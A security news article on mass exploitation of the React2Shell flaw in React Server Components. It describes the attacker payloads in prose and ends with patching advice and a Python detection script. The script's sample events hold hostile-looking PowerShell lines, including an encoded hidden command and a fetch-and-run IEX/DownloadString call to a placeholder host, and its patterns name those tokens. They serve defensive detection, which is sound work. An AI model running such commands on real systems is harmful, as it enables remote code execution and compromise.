
Exploitation of CVE-2025-55182, a critical vulnerability in React Server Components (RSC) dubbed React2Shell, has surged dramatically over the weekend.
Telemetry from threat intelligence organizations shows the number of compromised or actively attacking hosts has increased tenfold, targeting over 77,000 vulnerable systems exposed to the internet. Although the figure had fallen to 29,000 by Sunday, the attack surface remains huge.
The vulnerability, discovered by independent researcher Lachlan Davidson and reported to Meta on November 29, 2025, resides in unsafe deserialization logic within React's “Flight” protocol. It enables unauthenticated remote code execution (RCE) on affected systems, many of which use default configurations in popular frameworks like Next.js, RedwoodJS, and Vite's RSC plugin. Despite patches being released by December 1 and a coordinated disclosure on December 3, exploitation began almost immediately and has since escalated rapidly.
Evolution of the attacks
While initial attacks were linked to Chinese APTs like Earth Lamia and Jackpot Panda, who focused on reconnaissance and live debugging, the threat landscape evolved swiftly. By December 5, reports from GreyNoise confirmed the beginning of opportunistic mass exploitation. Attackers began using public PoCs and automation to indiscriminately scan and compromise systems, often leveraging infrastructure traditionally associated with botnets.
The Shadowserver Foundation, which operates one of the internet's most extensive honeypot and scanning infrastructures, observed a clear spike in malicious activity beginning December 5. Attack traffic originating from compromised Next.js servers jumped from a baseline of around 100 IPs to nearly 1,000, with payloads targeting Shadowserver's sensors.
In parallel, Shadowserver detected 77,664 publicly exposed IPs vulnerable to the flaw, a figure that had dropped to 28,964 as of December 7.
The rise in volume is also accompanied by a deepening of the attacker toolkit. GreyNoise reports that automated exploitation is leveraging multi-stage payloads. These include proof-of-execution probes using simple arithmetic commands in PowerShell (powershell -c "40320*43488"), followed by base64-encoded downloaders.
These payloads use well-known obfuscation and evasion techniques, such as flipping the AMSI bypass flag to neutralize anti-malware scanning. GreyNoise also observed that a significant share of exploitation IPs were first seen in December 2025, indicative of fresh infrastructure being spun up to feed the campaign.
Another disturbing development is the emergence of a Chrome extension publicly hosted on GitHub that automatically scans for and exploits vulnerable targets as users browse the web, blurring the line between passive scanning and live exploitation.
The affected software stack is deeply embedded across cloud environments. According to prior analysis from Wiz Research, 39% of cloud setups use vulnerable React components, and 69% use Next.js, with many of those exposed due to default configurations. React Server Components, particularly in Next.js 13 and 14's App Router, are commonly front-facing, meaning exploitation often leads directly to system-level access.
Public PoCs require only a single HTTP POST request to exploit default deployments. The attack abuses the $@ deserialization syntax in the Flight protocol to inject arbitrary JavaScript, which is then executed server-side via the Function constructor.
Defending
Given the current scale and automation of the attack campaign, defenders should assume opportunistic targeting is underway across all vulnerable infrastructure. Immediate actions include:
- Upgrade react-server-dom-* to 19.0.1, 19.1.2, or 19.2.1
- Move to Next.js 16.0.7 or the latest patched release
- Use GreyNoise's blocklists to filter automation-heavy traffic.
- Watch for suspicious PowerShell usage, especially commands with -enc, DownloadString, IEX, or AmsiUtils.
- Flag multiple executions of PowerShell arithmetic like XXXXX*YYYYY, often used as lightweight execution checks.
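The last two detection items above, turned into a small triage script as an added example (this is not code from the article or from GreyNoise): it scans constructed process-creation events for the PowerShell tokens the article lists, spots the XXXXX*YYYYY arithmetic probe, and raises a per-host alert once the probe repeats. The sample events, the PROBE_THRESHOLD value and the "parent is node" heuristic are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed process-creation events (not real telemetry): host, parent image, command line.
SAMPLE_EVENTS = [
    {"host": "web-01", "parent": "node.exe", "cmd": 'powershell -c "40320*43488"'},
    {"host": "web-01", "parent": "node.exe", "cmd": 'powershell -c "51234*12345"'},
    {"host": "web-01", "parent": "node.exe", "cmd": "powershell -nop -w hidden -enc QQBBAEEAQQBBAEEA"},
    {"host": "web-02", "parent": "explorer.exe", "cmd": "powershell Get-ChildItem C:\\Users"},
    {"host": "web-03", "parent": "node.exe",
     "cmd": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""},
    {"host": "web-02", "parent": "cmd.exe", "cmd": "cmd /c echo 40320*43488"},
]

# Tokens the article names as suspicious, and the arithmetic execution probe (XXXXX*YYYYY).
SUSPICIOUS = re.compile(r"-enc\w*|downloadstring|\biex\b|amsiutils", re.IGNORECASE)
ARITH_PROBE = re.compile(r"\b\d{3,}\s*\*\s*\d{3,}\b")
PROBE_THRESHOLD = 2  # assumed: this many probes on one host is worth an alert

def is_powershell(cmd):
    # Compare only the basename of the first token so full paths still match.
    exe = (cmd.split() or [""])[0].lower().replace("\\", "/").rsplit("/", 1)[-1]
    return exe in ("powershell", "powershell.exe", "pwsh", "pwsh.exe")

def classify(event):
    """Return the reasons one event looks like React2Shell follow-on activity."""
    cmd = event["cmd"]
    if not is_powershell(cmd):
        return []
    reasons = ["token:" + m.lower() for m in SUSPICIOUS.findall(cmd)]
    if ARITH_PROBE.search(cmd):
        reasons.append("arith_probe")
    # Assumption: the Node process of a Next.js host spawning PowerShell is itself a strong signal.
    if event.get("parent", "").lower().startswith("node"):
        reasons.append("parent:node")
    return reasons

def triage(events):
    """Group suspicious events per host; repeated arithmetic probes raise a host-level alert."""
    findings, probes = defaultdict(list), Counter()
    for ev in events:
        reasons = classify(ev)
        if reasons:
            findings[ev["host"]].append((ev["cmd"], reasons))
        if "arith_probe" in reasons:
            probes[ev["host"]] += 1
    alerts = {host: n for host, n in probes.items() if n >= PROBE_THRESHOLD}
    return dict(findings), alerts

print(triage(SAMPLE_EVENTS))
```

On the constructed events, web-01 trips the repeated-probe alert while the benign Get-ChildItem run on web-02 and the non-PowerShell echo produce no findings.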